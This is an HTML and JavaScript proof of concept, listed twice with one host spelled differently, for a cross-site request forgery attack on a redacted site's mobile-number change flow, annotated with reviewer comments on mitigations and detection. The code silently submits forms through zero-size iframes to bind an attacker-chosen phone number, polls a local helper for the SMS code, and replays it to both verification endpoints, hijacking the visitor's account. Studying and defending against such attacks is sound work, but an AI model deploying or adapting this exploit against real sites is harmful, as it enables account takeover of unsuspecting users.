<!-- Cross-site request forgery (CSRF) proof of concept against a "change bound mobile number"
     flow; the target host is redacted as www.xxx.com. This element is only the container that
     post() appends its hidden iframes to. width/height are not div attributes and have no effect. -->
<div id='poc' width=0 height=0></div>
<script>
// Blocking fetch helper: issues a synchronous GET for `url` and returns the response body.
// Returns responseText only when the status is exactly 200; any other status yields undefined,
// which the caller (getcode) does not guard against.
// `httpRequest` is assigned without a declaration, so it ends up on the global object.
function get(url){
  var xhr = new XMLHttpRequest();
  httpRequest = xhr;
  xhr.open('GET', url, false); // third argument false = synchronous request
  xhr.send();
  if (xhr.status !== 200) {
    return undefined;
  }
  return xhr.responseText;
}
// Cross-site POST helper of this proof of concept.
// Builds a small HTML document containing one form (action = url, method POST, a single text
// input named `key` holding `value`) and an inline script that submits it, base64-encodes the
// document into a data: URL, loads it in a 0x0 iframe and appends that iframe to element `poc`.
// Defender view: this is a plain auto-submitted form, so it succeeds only if the target accepts
// a state-changing POST on ambient session cookies alone. A per-session anti-CSRF token,
// SameSite=Lax/Strict session cookies, or an Origin/Referer check on the endpoint each stop it.
// Whether the target enforces any of these is not shown on this page.
function post(url, key, value){
// `data` (and `f` below) are undeclared and therefore global; getcode() writes `data` too.
data='<body><form id="f1" action="'+url+'" method="POST"> \
<input name="'+key+'" type="text" value="'+value+'" /> \
</form> \
<script> \
f1.submit(function(){return false}) \
<\/script></body>'
// HTMLFormElement.submit() takes no arguments, so the function passed to it in the generated
// page is ignored; the form is simply submitted as soon as the frame loads.
f=document.createElement('iframe')
// A document loaded from a data: URL has an opaque origin, so the resulting POST is sent with
// `Origin: null`. Such requests on account-change endpoints are a useful detection signal.
f.src="data:text/html;base64,"+btoa(data)
// Zero-sized frame: nothing is rendered to the user while the request is made.
f.height=0
f.width=0
poc.append(f)
}
// Interval callback: polls a helper on the local host for the SMS code and, once the response
// body is non-empty, stops polling and hands the body to exploit().
// NOTE(review): what 1.php returns is not shown; presumably it relays the code texted to the
// number submitted at the bottom of this script, i.e. a phone the PoC author controls. Confirm.
// If get() returns undefined (non-200 response) the `.length` read throws a TypeError.
// `url` and `data` are undeclared globals shared with the other functions on this page.
function getcode(){
  url = 'http://127.0.0.1/1.php';
  data = get(url);
  if (!(data.length > 0)) {
    return;
  }
  clearInterval(sh);
  exploit(data);
}
// Final stage: submits one SMS code to both verification endpoints through post().
// code: the string getcode() read from the local helper.
// The same value is sent as `smscode1` to verify_mobile_sms immediately and as `smscode2` to
// verify_new_mobile_sms 3000 ms later. The alert at 4000 ms only announces completion; no
// server response is read, so it does not prove the change took effect.
// NOTE(review): if both steps accept this single code, the service is not binding an SMS code
// to the phone number and the step it was issued for. Confirm server-side. Mitigations: bind
// each code to (session, number, purpose), require the first step to use a code sent to the
// currently bound number, require re-authentication for this change, and add anti-CSRF tokens.
function exploit(code){
// `url` is an undeclared global; setTimeout receives its current value as an argument, so the
// reassignment below does not affect the first timer.
url = "https://www.xxx.com/user/verify_mobile_sms"
setTimeout(post, 0, url, "smscode1", code)
url = "https://www.xxx.com/user/verify_new_mobile_sms"
setTimeout(post, 3000, url, "smscode2", code)
setTimeout(alert, 4000, 'mobile changed!')
}
// Entry sequence, run as soon as the page loads in the victim's browser.
// Step 1: cross-site POST of `mobile=18888888888` to send_new_mobile_sms. Judging by its name
// this asks the service to text a verification code to that number (server side not shown).
// Detection hint: this request arrives without a preceding successful old-number verification
// in the same session and with a foreign or null Origin.
post("https://www.xxx.com/user/send_new_mobile_sms", 'mobile', '18888888888')
// Global `code` is set here but never read on this page; exploit() uses its own parameter.
code = ''
// Step 2: poll getcode() once per second; getcode() clears this timer through `sh`.
sh=setInterval(getcode,1000);
</script>
<!-- Second listing of the same CSRF proof of concept. If both listings were served in one
     document, id "poc" would be duplicated; this is probably a duplicated paste. Verify against
     the original page. width/height are not div attributes and have no effect. -->
<div id='poc' width=0 height=0></div>
<script>
// Blocking fetch helper: issues a synchronous GET for `url` and returns the response body.
// Returns responseText only when the status is exactly 200; any other status yields undefined,
// which the caller (getcode) does not guard against.
// `httpRequest` is assigned without a declaration, so it ends up on the global object.
function get(url){
  var xhr = new XMLHttpRequest();
  httpRequest = xhr;
  xhr.open('GET', url, false); // third argument false = synchronous request
  xhr.send();
  if (xhr.status !== 200) {
    return undefined;
  }
  return xhr.responseText;
}
// Cross-site POST helper of this proof of concept.
// Builds a small HTML document containing one form (action = url, method POST, a single text
// input named `key` holding `value`) and an inline script that submits it, base64-encodes the
// document into a data: URL, loads it in a 0x0 iframe and appends that iframe to element `poc`.
// Defender view: this is a plain auto-submitted form, so it succeeds only if the target accepts
// a state-changing POST on ambient session cookies alone. A per-session anti-CSRF token,
// SameSite=Lax/Strict session cookies, or an Origin/Referer check on the endpoint each stop it.
// Whether the target enforces any of these is not shown on this page.
function post(url, key, value){
// `data` (and `f` below) are undeclared and therefore global; getcode() writes `data` too.
data='<body><form id="f1" action="'+url+'" method="POST"> \
<input name="'+key+'" type="text" value="'+value+'" /> \
</form> \
<script> \
f1.submit(function(){return false}) \
<\/script></body>'
// HTMLFormElement.submit() takes no arguments, so the function passed to it in the generated
// page is ignored; the form is simply submitted as soon as the frame loads.
f=document.createElement('iframe')
// A document loaded from a data: URL has an opaque origin, so the resulting POST is sent with
// `Origin: null`. Such requests on account-change endpoints are a useful detection signal.
f.src="data:text/html;base64,"+btoa(data)
// Zero-sized frame: nothing is rendered to the user while the request is made.
f.height=0
f.width=0
poc.append(f)
}
// Interval callback: polls a helper on the local host for the SMS code and, once the response
// body is non-empty, stops polling and hands the body to exploit().
// NOTE(review): what 1.php returns is not shown; presumably it relays the code texted to the
// number submitted at the bottom of this script, i.e. a phone the PoC author controls. Confirm.
// If get() returns undefined (non-200 response) the `.length` read throws a TypeError.
// `url` and `data` are undeclared globals shared with the other functions on this page.
function getcode(){
  url = 'http://127.0.0.1/1.php';
  data = get(url);
  if (!(data.length > 0)) {
    return;
  }
  clearInterval(sh);
  exploit(data);
}
// Final stage: submits one SMS code to both verification endpoints through post().
// code: the string getcode() read from the local helper.
// The same value is sent as `smscode1` to verify_mobile_sms immediately and as `smscode2` to
// verify_new_mobile_sms 3000 ms later. The alert at 4000 ms only announces completion; no
// server response is read, so it does not prove the change took effect.
// NOTE(review): if both steps accept this single code, the service is not binding an SMS code
// to the phone number and the step it was issued for. Confirm server-side. Mitigations: bind
// each code to (session, number, purpose), require the first step to use a code sent to the
// currently bound number, require re-authentication for this change, and add anti-CSRF tokens.
function exploit(code){
// `url` is an undeclared global; setTimeout receives its current value as an argument, so the
// reassignment below does not affect the first timer.
// NOTE(review): the redacted host on the next line is spelled differently from every other
// endpoint in this listing; this looks like a redaction inconsistency in the write-up.
url = "https://www.jxxx.com/user/verify_mobile_sms"
setTimeout(post, 0, url, "smscode1", code)
url = "https://www.xxx.com/user/verify_new_mobile_sms"
setTimeout(post, 3000, url, "smscode2", code)
setTimeout(alert, 4000, 'mobile changed!')
}
// Entry sequence, run as soon as the page loads in the victim's browser.
// Step 1: cross-site POST of `mobile=18888888888` to send_new_mobile_sms. Judging by its name
// this asks the service to text a verification code to that number (server side not shown).
// Detection hint: this request arrives without a preceding successful old-number verification
// in the same session and with a foreign or null Origin.
post("https://www.xxx.com/user/send_new_mobile_sms", 'mobile', '18888888888')
// Global `code` is set here but never read on this page; exploit() uses its own parameter.
code = ''
// Step 2: poll getcode() once per second; getcode() clears this timer through `sh`.
sh=setInterval(getcode,1000);
</script>